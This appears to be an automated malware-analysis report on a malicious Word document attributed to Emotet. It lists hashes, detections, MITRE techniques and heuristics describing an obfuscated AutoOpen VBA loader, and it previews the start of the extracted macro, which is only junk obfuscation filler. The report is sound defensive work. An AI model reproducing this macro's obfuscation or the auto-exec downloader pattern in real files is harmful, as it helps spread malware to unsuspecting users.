Emotet Office (OLE) malware analysis — malicious · 2c132d139e6dfbce

MALICIOUS

Office (OLE)

281.5 KB Created: 2019-10-11 12:46:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: b114c32a3fb47bd286d2f3cf6ac81776 SHA-1: 0ec4e538bb849cf3c48f810952cc682ddec75840 SHA-256: 2c132d139e6dfbce52f8cbba855f72603dc5cd7eae1cc6ccd5c78faa09e6a237

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros, specifically an AutoOpen macro. Heuristics indicate an obfuscated loader that uses GetObject and execution functions, consistent with Emotet's behavior. ClamAV detection further confirms this, identifying it as Doc.Downloader.Emotet-7330271-0. The VBA script's primary function appears to be downloading and executing a second-stage payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7330271-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7330271-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83011 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	83011 bytes
SHA-256: `2f70eea2a10baadbb674cc745b438e15ce1e37f0dd451152dc649212678bcefe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "c5x464380577" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "b100791850x, 0, 0, MSForms, TextBox" Attribute VB_Control = "x0b05200c00, 1, 1, MSForms, TextBox" Attribute VB_Control = "c03505c991c1, 2, 2, MSForms, TextBox" Attribute VB_Control = "b10431b7250, 3, 3, MSForms, TextBox" Attribute VB_Control = "c37021c0x1764, 4, 4, MSForms, TextBox" Attribute VB_Control = "b7x09783522, 5, 5, MSForms, TextBox" Attribute VB_Name = "bc9850999c4" Function b1c42c65025() On Error Resume Next 'Central320 DuBuque Valley, Kayleighhaven, Anguilla National60941 Grant Harbor, West Vestahaven, Madagascar x2809x0c0c2 = Rnd(x10b0060001c7 * ChrB(504)) + Log(876) 'Legacy7581 Boyer Branch, South Evanburgh, Macedonia National691 Nat Bypass, Murrayport, Holy See (Vatican City State) b64044bc3b1 = Rnd(bccx59100070 * ChrB(691)) + Log(575) 'Dynamic321 Koepp Spring, Wardborough, Montserrat Investor79775 Brock Road, Buckridgeport, British Indian Ocean Territory (Chagos Archipelago) x440bc07302 = Rnd(cb5x81169819 * ChrB(756)) + Log(519) 'Regional84310 Julius Haven, Vivienberg, Ecuador Customer896 Howard Rest, Ryanview, Tunisia x070c3c0902c6 = Rnd(c490c10300808 * ChrB(850)) + Log(426) 'Dynamic88647 Duane Estate, Lake Irma, Saint Lucia Direct16290 Pacocha Mills, South Elmira, Montserrat xb150000cc3c3 = Rnd(b808026005157 * ChrB(548)) + Log(179) 'Global162 Schoen Branch, Jacobibury, Togo Regional857 Frami Cliff, Lake Guadalupemouth, New Zealand b620910b7xx5 = Rnd(cb5015xxx8582 * ChrB(513)) + Log(951) 'International09048 Green Oval, Nathanaeltown, Jamaica Internal30314 Daniella Glen, North Nick, Portugal b4cb9700405 = Rnd(x800x0049834 * ChrB(254)) + Log(199) 'Senior00187 George Greens, Lake Jamison, Switzerland Investor523 Ulises Club, West Dusty, Suriname 'Customer32336 Cecelia Haven, Lake Susannaville, Finland District1708 Langworth Passage, Kyleberg, Ukraine b85x05x08040 = Rnd(xb09050398825 * ChrB(846)) + Log(952) 'Lead77351 Jerel Harbor, Damionshire, Bulgaria Chief57639 Zelda Tunnel, Fatimashire, Guinea c081x31006b61 = Rnd(b10x18985x9 * ChrB(122)) + Log(93) 'International15485 Ezekiel Pine, Joannytown, Kyrgyz Republic Chief42204 Blick Plaza, West Silas, Madagascar c48x4b0b96170 = Rnd(x0073824654 * ChrB(874)) + Log(76) 'Dynamic576 Shields Landing, Reinholdfurt, Saint Vincent and the Grenadines Central46479 Nicola Drive, Declanport, San Marino xc1212b30bc = Rnd(c986524648b * ChrB(926)) + Log(726) 'Regional10852 O'Conner Tunnel, West Laceymouth, Armenia Future451 Sanford Square, Port Darrel, Niue x60c6x0006304 = Rnd(c3905287000 * ChrB(170)) + Log(411) 'Human7209 Rutherford Islands, Gutmannbury, Hungary Central76757 Adrien Trace, Moorebury, Somalia b06bc4x6396b1 = Rnd(x38b728x038 * ChrB(695)) + Log(696) 'Global361 Kihn Walks, Dakotafort, Sri Lanka Corporate990 Gracie Keys, Port Furman, Uganda c1170x3cx100 = Rnd(b8181x745307 * ChrB(399)) + Log(486) 'Dynamic33589 Ona Shore, Port Hayley, Bouvet Island (Bouvetoya) Chief4772 Batz Tunnel, Cristianview, Switzerland 'Central85884 Larson Skyway, South Ludwig, China Human0013 Stiedemann Brook, Lake Merrittberg, Virgin Islands, U.S. x9c263073b1 = Rnd(c8x05004287 * ChrB(512)) + Log(587) 'Corporate874 Bernier Creek, Crystalborough, Bulgaria Customer8112 Roman Parks, Rosamondbury, Nigeria c80cb83803914 = Rnd(x06620b501x0 * ChrB(696)) + Log(547) 'Chief9695 Cindy Highway, Marvintown, Albania National47768 Pacocha Views, West Ritatown, Gabon cb798818c07c = Rnd(x37x95c5bx2 * ChrB(700)) + Log(665) 'Product960 Travon Mountains, East Thelmabury, Venezuela Central9914 Schuppe Course, East Janicehaven, Cambodia xb0b96xx2b50 = Rnd(b870c20c570 * ChrB(116)) + Log(955) 'Lead28507 Morissette Glen, New Lesliefurt, Pitcairn Islands Customer409 Lilian Plaza, West Jillian, Cuba b20657x0610 = Rnd(bxx1b22c706b * ChrB(733)) + ... (truncated)

SHA-256: 2f70eea2a10baadbb674cc745b438e15ce1e37f0dd451152dc649212678bcefe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "c5x464380577"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b100791850x, 0, 0, MSForms, TextBox"
Attribute VB_Control = "x0b05200c00, 1, 1, MSForms, TextBox"
Attribute VB_Control = "c03505c991c1, 2, 2, MSForms, TextBox"
Attribute VB_Control = "b10431b7250, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c37021c0x1764, 4, 4, MSForms, TextBox"
Attribute VB_Control = "b7x09783522, 5, 5, MSForms, TextBox"

Attribute VB_Name = "bc9850999c4"
Function b1c42c65025()
On Error Resume Next
   'Central320 DuBuque Valley, Kayleighhaven, Anguilla National60941 Grant Harbor, West Vestahaven, Madagascar
x2809x0c0c2 = Rnd(x10b0060001c7 * ChrB(504)) + Log(876)
'Legacy7581 Boyer Branch, South Evanburgh, Macedonia National691 Nat Bypass, Murrayport, Holy See (Vatican City State)
b64044bc3b1 = Rnd(bccx59100070 * ChrB(691)) + Log(575)
'Dynamic321 Koepp Spring, Wardborough, Montserrat Investor79775 Brock Road, Buckridgeport, British Indian Ocean Territory (Chagos Archipelago)
x440bc07302 = Rnd(cb5x81169819 * ChrB(756)) + Log(519)
'Regional84310 Julius Haven, Vivienberg, Ecuador Customer896 Howard Rest, Ryanview, Tunisia
x070c3c0902c6 = Rnd(c490c10300808 * ChrB(850)) + Log(426)
'Dynamic88647 Duane Estate, Lake Irma, Saint Lucia Direct16290 Pacocha Mills, South Elmira, Montserrat
xb150000cc3c3 = Rnd(b808026005157 * ChrB(548)) + Log(179)
'Global162 Schoen Branch, Jacobibury, Togo Regional857 Frami Cliff, Lake Guadalupemouth, New Zealand
b620910b7xx5 = Rnd(cb5015xxx8582 * ChrB(513)) + Log(951)
'International09048 Green Oval, Nathanaeltown, Jamaica Internal30314 Daniella Glen, North Nick, Portugal
b4cb9700405 = Rnd(x800x0049834 * ChrB(254)) + Log(199)
'Senior00187 George Greens, Lake Jamison, Switzerland Investor523 Ulises Club, West Dusty, Suriname
'Customer32336 Cecelia Haven, Lake Susannaville, Finland District1708 Langworth Passage, Kyleberg, Ukraine
b85x05x08040 = Rnd(xb09050398825 * ChrB(846)) + Log(952)
'Lead77351 Jerel Harbor, Damionshire, Bulgaria Chief57639 Zelda Tunnel, Fatimashire, Guinea
c081x31006b61 = Rnd(b10x18985x9 * ChrB(122)) + Log(93)
'International15485 Ezekiel Pine, Joannytown, Kyrgyz Republic Chief42204 Blick Plaza, West Silas, Madagascar
c48x4b0b96170 = Rnd(x0073824654 * ChrB(874)) + Log(76)
'Dynamic576 Shields Landing, Reinholdfurt, Saint Vincent and the Grenadines Central46479 Nicola Drive, Declanport, San Marino
xc1212b30bc = Rnd(c986524648b * ChrB(926)) + Log(726)
'Regional10852 O'Conner Tunnel, West Laceymouth, Armenia Future451 Sanford Square, Port Darrel, Niue
x60c6x0006304 = Rnd(c3905287000 * ChrB(170)) + Log(411)
'Human7209 Rutherford Islands, Gutmannbury, Hungary Central76757 Adrien Trace, Moorebury, Somalia
b06bc4x6396b1 = Rnd(x38b728x038 * ChrB(695)) + Log(696)
'Global361 Kihn Walks, Dakotafort, Sri Lanka Corporate990 Gracie Keys, Port Furman, Uganda
c1170x3cx100 = Rnd(b8181x745307 * ChrB(399)) + Log(486)
'Dynamic33589 Ona Shore, Port Hayley, Bouvet Island (Bouvetoya) Chief4772 Batz Tunnel, Cristianview, Switzerland
   'Central85884 Larson Skyway, South Ludwig, China Human0013 Stiedemann Brook, Lake Merrittberg, Virgin Islands, U.S.
x9c263073b1 = Rnd(c8x05004287 * ChrB(512)) + Log(587)
'Corporate874 Bernier Creek, Crystalborough, Bulgaria Customer8112 Roman Parks, Rosamondbury, Nigeria
c80cb83803914 = Rnd(x06620b501x0 * ChrB(696)) + Log(547)
'Chief9695 Cindy Highway, Marvintown, Albania National47768 Pacocha Views, West Ritatown, Gabon
cb798818c07c = Rnd(x37x95c5bx2 * ChrB(700)) + Log(665)
'Product960 Travon Mountains, East Thelmabury, Venezuela Central9914 Schuppe Course, East Janicehaven, Cambodia
xb0b96xx2b50 = Rnd(b870c20c570 * ChrB(116)) + Log(955)
'Lead28507 Morissette Glen, New Lesliefurt, Pitcairn Islands Customer409 Lilian Plaza, West Jillian, Cuba
b20657x0610 = Rnd(bxx1b22c706b * ChrB(733)) +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.